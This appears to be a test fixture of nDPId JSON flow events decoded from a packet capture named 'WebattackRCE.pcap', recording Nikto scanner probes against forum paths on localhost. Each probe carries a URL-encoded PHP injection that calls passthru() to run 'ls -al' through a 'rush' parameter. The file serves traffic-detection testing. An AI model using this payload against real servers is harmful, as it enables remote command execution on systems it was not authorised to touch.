-00888{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":684,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":684,"flow_packet_id":1,"flow_last_seen":1576420277799,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":372,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":372,"pkt_l4_len":338,"thread_ts_msec":1576420277799,"pkt":"AAAAAAAAAAAAAAAACABFAAFm4IpAAEAGWwV\/AAABfwAAAcbyH5CWqtmi9bUd64AYAED\/WgAAAQEICp1m\/0+dZv9PR0VUIC9pbmRleC5waHA\/bmFtZT1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5NykNCg0K"} -01223{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":684,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":684,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277799,"flow_last_seen":1576420277799,"flow_idle_time":7440000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277799,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50930,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":685,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":685,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277800,"flow_last_seen":1576420277800,"flow_idle_time":7440000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"thread_ts_msec":1576420277800,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50932,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00900{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":685,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":685,"flow_packet_id":1,"flow_last_seen":1576420277800,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":381,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":381,"pkt_l4_len":347,"thread_ts_msec":1576420277800,"pkt":"AAAAAAAAAAAAAAAACABFAAFvelxAAEAGwSp\/AAABfwAAAcb0H5AcBENxXyULZYAYAED\/YwAAAQEICp1m\/1CdZv9QR0VUIC9wb3N0bnVrZS9pbmRleC5waHA\/bmFtZT1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTcpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01233{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":685,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":685,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277800,"flow_last_seen":1576420277800,"flow_idle_time":7440000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"thread_ts_msec":1576420277800,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50932,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":686,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":686,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277802,"flow_last_seen":1576420277802,"flow_idle_time":7440000,"flow_min_l4_payload_len":320,"flow_max_l4_payload_len":320,"flow_tot_l4_payload_len":320,"flow_avg_l4_payload_len":320,"midstream":1,"thread_ts_msec":1576420277802,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50934,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00907{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":686,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":686,"flow_packet_id":1,"flow_last_seen":1576420277802,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":386,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":386,"pkt_l4_len":352,"thread_ts_msec":1576420277802,"pkt":"AAAAAAAAAAAAAAAACABFAAF0IClAAEAGG1l\/AAABfwAAAcb2H5CLkRkOnTgF7oAYAED\/aAAAAQEICp1m\/1GdZv9RR0VUIC9wb3N0bnVrZS9odG1sL2luZGV4LnBocD9uYW1lPUZvcnVtcyZmaWxlPXZpZXd0b3BpYyZ0PTImcnVzaD0lNmMlNzMlMjAlMmQlNjElNmMmaGlnaGxpZ2h0PSUyNTI3LiU3MCU2MSU3MyU3MyU3NCU2OCU3MiU3NSUyOCUyNCU0OCU1NCU1NCU1MCU1ZiU0NyU0NSU1NCU1ZiU1NiU0MSU1MiU1MyU1YiU3MiU3NSU3MyU2OCU1ZCUyOS4lMjUyNyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzk3KQ0KDQo="} -01239{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":686,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":686,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277802,"flow_last_seen":1576420277802,"flow_idle_time":7440000,"flow_min_l4_payload_len":320,"flow_max_l4_payload_len":320,"flow_tot_l4_payload_len":320,"flow_avg_l4_payload_len":320,"midstream":1,"thread_ts_msec":1576420277802,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50934,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":687,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":687,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277803,"flow_last_seen":1576420277803,"flow_idle_time":7440000,"flow_min_l4_payload_len":314,"flow_max_l4_payload_len":314,"flow_tot_l4_payload_len":314,"flow_avg_l4_payload_len":314,"midstream":1,"thread_ts_msec":1576420277803,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50936,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00899{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":687,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":687,"flow_packet_id":1,"flow_last_seen":1576420277803,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":380,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":380,"pkt_l4_len":346,"thread_ts_msec":1576420277803,"pkt":"AAAAAAAAAAAAAAAACABFAAFudhVAAEAGxXJ\/AAABfwAAAcb4H5C7R086db2J2oAYAED\/YgAAAQEICp1m\/1OdZv9TR0VUIC9tb2R1bGVzL2luZGV4LnBocD9uYW1lPUZvcnVtcyZmaWxlPXZpZXd0b3BpYyZ0PTImcnVzaD0lNmMlNzMlMjAlMmQlNjElNmMmaGlnaGxpZ2h0PSUyNTI3LiU3MCU2MSU3MyU3MyU3NCU2OCU3MiU3NSUyOCUyNCU0OCU1NCU1NCU1MCU1ZiU0NyU0NSU1NCU1ZiU1NiU0MSU1MiU1MyU1YiU3MiU3NSU3MyU2OCU1ZCUyOS4lMjUyNyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5NykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01232{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":687,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":687,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277803,"flow_last_seen":1576420277803,"flow_idle_time":7440000,"flow_min_l4_payload_len":314,"flow_max_l4_payload_len":314,"flow_tot_l4_payload_len":314,"flow_avg_l4_payload_len":314,"midstream":1,"thread_ts_msec":1576420277803,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50936,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":688,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":688,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277804,"flow_last_seen":1576420277804,"flow_idle_time":7440000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277804,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50938,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00896{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":688,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":688,"flow_packet_id":1,"flow_last_seen":1576420277804,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":378,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":378,"pkt_l4_len":344,"thread_ts_msec":1576420277804,"pkt":"AAAAAAAAAAAAAAAACABFAAFsoC9AAEAGm1p\/AAABfwAAAcb6H5AztpkH42OkkoAYAED\/YAAAAQEICp1m\/1SdZv9UR0VUIC9waHBCQi9pbmRleC5waHA\/bmFtZT1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5NykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01230{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":688,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":688,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277804,"flow_last_seen":1576420277804,"flow_idle_time":7440000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277804,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50938,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":689,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":689,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277807,"flow_last_seen":1576420277807,"flow_idle_time":7440000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277807,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50940,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00896{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":689,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":689,"flow_packet_id":1,"flow_last_seen":1576420277807,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":378,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":378,"pkt_l4_len":344,"thread_ts_msec":1576420277807,"pkt":"AAAAAAAAAAAAAAAACABFAAFsAqdAAEAGOON\/AAABfwAAAcb8H5ASjTuPR79V4YAYAED\/YAAAAQEICp1m\/1edZv9XR0VUIC9mb3J1bS9pbmRleC5waHA\/bmFtZT1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTcpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01230{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":689,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":689,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277807,"flow_last_seen":1576420277807,"flow_idle_time":7440000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277807,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50940,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":690,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":690,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277808,"flow_last_seen":1576420277808,"flow_idle_time":7440000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277808,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50942,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00893{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":690,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":690,"flow_packet_id":1,"flow_last_seen":1576420277808,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1576420277808,"pkt":"AAAAAAAAAAAAAAAACABFAAFnxERAAEAGd0p\/AAABfwAAAcb+H5AIB\/1vYBeRA4AYAED\/WwAAAQEICp1m\/1idZv9YR0VUIC9pbmRleC5waHA\/TmlrdG89Rm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzk3KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01224{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":690,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":690,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277808,"flow_last_seen":1576420277808,"flow_idle_time":7440000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277808,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50942,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":691,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":691,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277810,"flow_last_seen":1576420277810,"flow_idle_time":7440000,"flow_min_l4_payload_len":316,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":316,"midstream":1,"thread_ts_msec":1576420277810,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50944,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00905{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":691,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":691,"flow_packet_id":1,"flow_last_seen":1576420277810,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":382,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":382,"pkt_l4_len":348,"thread_ts_msec":1576420277810,"pkt":"AAAAAAAAAAAAAAAACABFAAFwFdRAAEAGJbJ\/AAABfwAAAccAH5A7eCz\/38X+m4AYAED\/ZAAAAQEICp1m\/1mdZv9ZR0VUIC9wb3N0bnVrZS9pbmRleC5waHA\/TmlrdG89Rm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzk3KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01234{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":691,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":691,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277810,"flow_last_seen":1576420277810,"flow_idle_time":7440000,"flow_min_l4_payload_len":316,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":316,"midstream":1,"thread_ts_msec":1576420277810,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50944,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":692,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":692,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277811,"flow_last_seen":1576420277811,"flow_idle_time":7440000,"flow_min_l4_payload_len":321,"flow_max_l4_payload_len":321,"flow_tot_l4_payload_len":321,"flow_avg_l4_payload_len":321,"midstream":1,"thread_ts_msec":1576420277811,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50946,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00908{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":692,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":692,"flow_packet_id":1,"flow_last_seen":1576420277811,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":387,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":387,"pkt_l4_len":353,"thread_ts_msec":1576420277811,"pkt":"AAAAAAAAAAAAAAAACABFAAF1vbdAAEAGfcl\/AAABfwAAAccCH5DikYSaCicX\/4AYAED\/aQAAAQEICp1m\/1udZv9bR0VUIC9wb3N0bnVrZS9odG1sL2luZGV4LnBocD9OaWt0bz1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTcpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01240{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":692,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":692,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277811,"flow_last_seen":1576420277811,"flow_idle_time":7440000,"flow_min_l4_payload_len":321,"flow_max_l4_payload_len":321,"flow_tot_l4_payload_len":321,"flow_avg_l4_payload_len":321,"midstream":1,"thread_ts_msec":1576420277811,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50946,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001397)"}} 